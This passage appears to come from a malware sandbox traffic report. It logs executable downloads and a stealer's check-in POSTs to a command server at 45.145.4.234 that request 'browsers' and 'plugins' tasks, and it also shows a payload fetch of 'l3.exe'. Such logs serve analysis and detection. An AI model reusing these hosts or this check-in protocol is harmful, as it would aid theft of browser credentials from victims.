                    Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Sun, 06 Oct 2024 20:18:45 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "a7550-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 685392Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00 00 00 90 0a 00 78 03 00 00 00 00 00 00 00 00 00 00 00 46 0a 00 50 2f 00 00 00 a0 0a 00 f0 23 00 00 94 16 0a 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 20 08 00 a0 00 00 00 00 00 00 00 00 00 00 00 a4 1e 0a 00 40 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 95 0c 08 00 00 10 00 00 00 0e 08 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 c4 06 02 00 00 20 08 00 00 08 02 00 00 12 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 3c 46 00 00 00 30 0a 00 00 02 00 00 00 1a 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 80 0a 00 00 02 00 00 00 1c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 90 0a 00 00 04 00 00 00 1e 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 f0 23 00 00 00 a0 0a 00 00 24 00 00 00 22 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                    Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Sun, 06 Oct 2024 20:18:46 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "94750-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 608080Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00 00 00 20 09 00 b0 08 00 00 00 00 00 00 00 00 00 00 00 18 09 00 50 2f 00 00 00 30 09 00 d8 41 00 00 14 53 08 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bc f8 07 00 18 00 00 00 68 d0 07 00 a0 00 00 00 00 00 00 00 00 00 00 00 ec bc 08 00 dc 03 00 00 e4 5a 08 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 61 b5 07 00 00 10 00 00 00 b6 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 94 09 01 00 00 d0 07 00 00 0a 01 00 00 ba 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 1d 00 00 00 e0 08 00 00 04 00 00 00 c4 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 00 09 00 00 02 00 00 00 c8 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 74 6c 73 00 00 00 00 15 00 00 00 00 10 09 00 00 02 00 00 00 ca 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 b0 08 00 00 00 20 09 00 00 0a 00 00 00 cc 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 d8 41 00 00 00 30 09 00 00 42 00 00 00 d6 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                    Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Sun, 06 Oct 2024 20:18:47 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "6dde8-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 450024Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 82 ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 28 06 00 00 82 00 00 00 00 00 00 60 d9 03 00 00 10 00 00 00 40 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 f0 06 00 00 04 00 00 2c e0 06 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 10 67 04 00 82 cf 01 00 e8 72 06 00 18 01 00 00 00 a0 06 00 f0 03 00 00 00 00 00 00 00 00 00 00 00 9c 06 00 e8 41 00 00 00 b0 06 00 ac 3d 00 00 60 78 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 77 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 70 06 00 e4 02 00 00 c0 63 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 92 26 06 00 00 10 00 00 00 28 06 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 29 00 00 00 40 06 00 00 18 00 00 00 2c 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 ac 13 00 00 00 70 06 00 00 14 00 00 00 44 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 69 64 61 74 00 00 34 00 00 00 00 90 06 00 00 02 00 00 00 58 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f0 03 00 00 00 a0 06 00 00 04 00 00 00 5a 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 ac 3d 00 00 00 b0 06 00 00 3e 00 00 00 5e 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                    Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Sun, 06 Oct 2024 20:18:47 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "1f3950-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 2046288Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00 00 00 50 1e 00 78 03 00 00 00 00 00 00 00 00 00 00 00 0a 1f 00 50 2f 00 00 00 60 1e 00 5c 08 01 00 b0 01 1d 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 f0 19 00 a0 00 00 00 00 00 00 00 00 00 00 00 7c ca 1d 00 5c 04 00 00 80 26 1d 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 89 d7 19 00 00 10 00 00 00 d8 19 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 6c ef 03 00 00 f0 19 00 00 f0 03 00 00 dc 19 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 52 00 00 00 e0 1d 00 00 2e 00 00 00 cc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 40 1e 00 00 02 00 00 00 fa 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 50 1e 00 00 04 00 00 00 fc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 5c 08 01 00 00 60 1e 00 00 0a 01 00 00 00 1e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                    Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Sun, 06 Oct 2024 20:18:49 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "3ef50-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 257872Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00 00 00 b0 03 00 80 03 00 00 00 00 00 00 00 00 00 00 00 c0 03 00 50 2f 00 00 00 c0 03 00 c8 35 00 00 38 71 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 e0 02 00 a0 00 00 00 00 00 00 00 00 00 00 00 14 7b 03 00 8c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 26 cb 02 00 00 10 00 00 00 cc 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 d4 ab 00 00 00 e0 02 00 00 ac 00 00 00 d0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 98 0b 00 00 00 90 03 00 00 08 00 00 00 7c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 a0 03 00 00 02 00 00 00 84 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 80 03 00 00 00 b0 03 00 00 04 00 00 00 86 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 c8 35 00 00 00 c0 03 00 00 36 00 00 00 8a 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                    Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Sun, 06 Oct 2024 20:18:49 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "13bf0-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 80880Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 de 00 00 00 1c 00 00 00 00 00 00 90 d9 00 00 00 10 00 00 00 f0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 30 01 00 00 04 00 00 d4 6d 01 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e0 e3 00 00 14 09 00 00 b8 00 01 00 8c 00 00 00 00 10 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 fa 00 00 f0 41 00 00 00 20 01 00 10 0a 00 00 80 20 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 20 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 b4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f4 dc 00 00 00 10 00 00 00 de 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 f4 05 00 00 00 f0 00 00 00 02 00 00 00 e2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 84 05 00 00 00 00 01 00 00 06 00 00 00 e4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 00 04 00 00 00 10 01 00 00 04 00 00 00 ea 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 10 0a 00 00 00 20 01 00 00 0c 00 00 00 ee 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                    Source: global trafficHTTP traffic detected: GET /folder/l3.exe HTTP/1.1Host: sst.myCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 45.145.4.234Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: POST /ce4b71a59f4ee761.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AAKJEGCFBGDHJJJJJKJEHost: 45.145.4.234Content-Length: 214Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 41 41 4b 4a 45 47 43 46 42 47 44 48 4a 4a 4a 4a 4a 4b 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 34 32 44 43 41 34 37 32 33 31 39 35 31 31 31 37 33 38 38 33 36 35 0d 0a 2d 2d 2d 2d 2d 2d 41 41 4b 4a 45 47 43 46 42 47 44 48 4a 4a 4a 4a 4a 4b 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 65 66 61 75 6c 74 0d 0a 2d 2d 2d 2d 2d 2d 41 41 4b 4a 45 47 43 46 42 47 44 48 4a 4a 4a 4a 4a 4b 4a 45 2d 2d 0d 0a Data Ascii: ------AAKJEGCFBGDHJJJJJKJEContent-Disposition: form-data; name="hwid"42DCA47231951117388365------AAKJEGCFBGDHJJJJJKJEContent-Disposition: form-data; name="build"default------AAKJEGCFBGDHJJJJJKJE--
                    Source: global trafficHTTP traffic detected: POST /ce4b71a59f4ee761.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IJEHCGIJECFIECBFIDGDHost: 45.145.4.234Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 49 4a 45 48 43 47 49 4a 45 43 46 49 45 43 42 46 49 44 47 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 65 37 31 33 36 38 64 36 39 63 36 33 39 32 38 31 39 32 31 62 36 34 36 32 65 32 64 37 36 37 38 64 37 63 64 31 65 31 62 30 33 37 63 61 39 34 63 37 37 63 36 35 37 65 33 62 32 66 32 36 63 31 33 39 63 66 65 31 31 32 34 0d 0a 2d 2d 2d 2d 2d 2d 49 4a 45 48 43 47 49 4a 45 43 46 49 45 43 42 46 49 44 47 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 62 72 6f 77 73 65 72 73 0d 0a 2d 2d 2d 2d 2d 2d 49 4a 45 48 43 47 49 4a 45 43 46 49 45 43 42 46 49 44 47 44 2d 2d 0d 0a Data Ascii: ------IJEHCGIJECFIECBFIDGDContent-Disposition: form-data; name="token"6e71368d69c639281921b6462e2d7678d7cd1e1b037ca94c77c657e3b2f26c139cfe1124------IJEHCGIJECFIECBFIDGDContent-Disposition: form-data; name="message"browsers------IJEHCGIJECFIECBFIDGD--
                    Source: global trafficHTTP traffic detected: POST /ce4b71a59f4ee761.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DAECAECFCAAEBFHIEHDGHost: 45.145.4.234Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 44 41 45 43 41 45 43 46 43 41 41 45 42 46 48 49 45 48 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 65 37 31 33 36 38 64 36 39 63 36 33 39 32 38 31 39 32 31 62 36 34 36 32 65 32 64 37 36 37 38 64 37 63 64 31 65 31 62 30 33 37 63 61 39 34 63 37 37 63 36 35 37 65 33 62 32 66 32 36 63 31 33 39 63 66 65 31 31 32 34 0d 0a 2d 2d 2d 2d 2d 2d 44 41 45 43 41 45 43 46 43 41 41 45 42 46 48 49 45 48 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 44 41 45 43 41 45 43 46 43 41 41 45 